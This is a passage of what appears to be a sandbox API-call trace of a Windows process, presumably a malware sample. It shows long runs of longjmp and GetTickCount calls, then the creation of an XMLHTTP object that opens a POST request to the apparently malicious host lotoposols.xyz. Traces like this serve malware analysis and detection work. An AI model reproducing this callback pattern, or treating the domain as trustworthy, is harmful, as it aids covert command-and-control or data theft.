	[0161.449] longjmp () 
	[0161.450] longjmp () 
	[0161.450] longjmp () 
	[0161.450] longjmp () 
	[0161.450] longjmp () 
	[0161.450] longjmp () 
	[0161.450] GetTickCount () returned 0x115f0a6
	[0161.450] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.451] longjmp () 
	[0161.452] longjmp () 
	[0161.452] longjmp () 
	[0161.452] longjmp () 
	[0161.452] longjmp () 
	[0161.452] longjmp () 
	[0161.453] longjmp () 
	[0161.453] longjmp () 
	[0161.453] longjmp () 
	[0161.453] longjmp () 
	[0161.453] longjmp () 
	[0161.453] longjmp () 
	[0161.454] longjmp () 
	[0161.454] longjmp () 
	[0161.454] longjmp () 
	[0161.454] longjmp () 
	[0161.454] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.455] longjmp () 
	[0161.456] longjmp () 
	[0161.456] GetTickCount () returned 0x115f0a6
	[0161.456] longjmp () 
	[0161.456] longjmp () 
	[0161.456] longjmp () 
	[0161.456] longjmp () 
	[0161.457] longjmp () 
	[0161.457] longjmp () 
	[0161.457] longjmp () 
	[0161.457] longjmp () 
	[0161.457] longjmp () 
	[0161.457] longjmp () 
	[0161.458] longjmp () 
	[0161.458] longjmp () 
	[0161.458] longjmp () 
	[0161.458] longjmp () 
	[0161.458] longjmp () 
	[0161.459] longjmp () 
	[0161.459] longjmp () 
	[0161.459] longjmp () 
	[0161.459] longjmp () 
	[0161.459] longjmp () 
	[0161.460] longjmp () 
	[0161.460] longjmp () 
	[0161.460] longjmp () 
	[0161.460] longjmp () 
	[0161.460] longjmp () 
	[0161.461] longjmp () 
	[0161.461] longjmp () 
	[0161.461] longjmp () 
	[0161.462] longjmp () 
	[0161.462] longjmp () 
	[0161.462] longjmp () 
	[0161.463] longjmp () 
	[0161.463] GetTickCount () returned 0x115f0b6
	[0161.463] longjmp () 
	[0161.463] longjmp () 
	[0161.463] longjmp () 
	[0161.463] longjmp () 
	[0161.463] longjmp () 
	[0161.464] longjmp () 
	[0161.464] longjmp () 
	[0161.464] longjmp () 
	[0161.464] longjmp () 
	[0161.464] longjmp () 
	[0161.464] longjmp () 
	[0161.465] longjmp () 
	[0161.465] longjmp () 
	[0161.465] longjmp () 
	[0161.465] longjmp () 
	[0161.465] longjmp () 
	[0161.465] longjmp () 
	[0161.466] longjmp () 
	[0161.466] longjmp () 
	[0161.466] longjmp () 
	[0161.466] longjmp () 
	[0161.466] longjmp () 
	[0161.466] longjmp () 
	[0161.467] longjmp () 
	[0161.467] longjmp () 
	[0161.467] longjmp () 
	[0161.467] longjmp () 
	[0161.467] longjmp () 
	[0161.468] longjmp () 
	[0161.468] longjmp () 
	[0161.468] longjmp () 
	[0161.468] longjmp () 
	[0161.468] GetTickCount () returned 0x115f0b6
	[0161.468] longjmp () 
	[0161.468] longjmp () 
	[0161.469] longjmp () 
	[0161.469] longjmp () 
	[0161.469] longjmp () 
	[0161.469] longjmp () 
	[0161.469] longjmp () 
	[0161.469] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.470] longjmp () 
	[0161.471] longjmp () 
	[0161.471] longjmp () 
	[0161.471] longjmp () 
	[0161.471] longjmp () 
	[0161.471] longjmp () 
	[0161.471] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.472] longjmp () 
	[0161.473] longjmp () 
	[0161.473] longjmp () 
	[0161.473] longjmp () 
	[0161.473] longjmp () 
	[0161.473] GetTickCount () returned 0x115f0b6
	[0161.473] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.474] longjmp () 
	[0161.475] longjmp () 
	[0161.475] longjmp () 
	[0161.475] longjmp () 
	[0161.475] longjmp () 
	[0161.475] longjmp () 
	[0161.475] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.476] longjmp () 
	[0161.477] longjmp () 
	[0161.477] longjmp () 
	[0161.477] longjmp () 
	[0161.477] longjmp () 
	[0161.477] longjmp () 
	[0161.478] longjmp () 
	[0161.478] longjmp () 
	[0161.478] longjmp () 
	[0161.479] longjmp () 
	[0161.479] longjmp () 
	[0161.479] longjmp () 
	[0161.479] GetTickCount () returned 0x115f0c5
	[0161.479] longjmp () 
	[0161.479] longjmp () 
	[0161.479] longjmp () 
	[0161.479] longjmp () 
	[0161.480] longjmp () 
	[0161.480] longjmp () 
	[0161.480] longjmp () 
	[0161.480] longjmp () 
	[0161.480] longjmp () 
	[0161.481] longjmp () 
	[0161.481] longjmp () 
	[0161.481] longjmp () 
	[0161.481] longjmp () 
	[0161.481] longjmp () 
	[0161.481] longjmp () 
	[0161.482] longjmp () 
	[0161.482] longjmp () 
	[0161.482] longjmp () 
	[0161.482] longjmp () 
	[0161.482] longjmp () 
	[0161.482] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.483] longjmp () 
	[0161.484] longjmp () 
	[0161.484] longjmp () 
	[0161.484] longjmp () 
	[0161.484] longjmp () 
	[0161.484] GetTickCount () returned 0x115f0c5
	[0161.484] longjmp () 
	[0161.484] longjmp () 
	[0161.485] longjmp () 
	[0161.485] longjmp () 
	[0161.485] longjmp () 
	[0161.485] longjmp () 
	[0161.485] longjmp () 
	[0161.485] longjmp () 
	[0161.487] longjmp () 
	[0161.487] longjmp () 
	[0161.487] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0161.487] SysStringLen (param_1=0x0) returned 0x0
	[0161.487] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0161.488] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0161.488] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0161.488] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0161.488] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0161.488] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0161.488] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0161.488] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0161.488] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0161.488] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0161.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0161.489] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0161.489] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0161.489] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0161.489] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0161.489] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0161.490] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0161.490] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0161.492] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0161.492] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0161.492] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0161.492] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0161.493] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0161.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0161.494] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
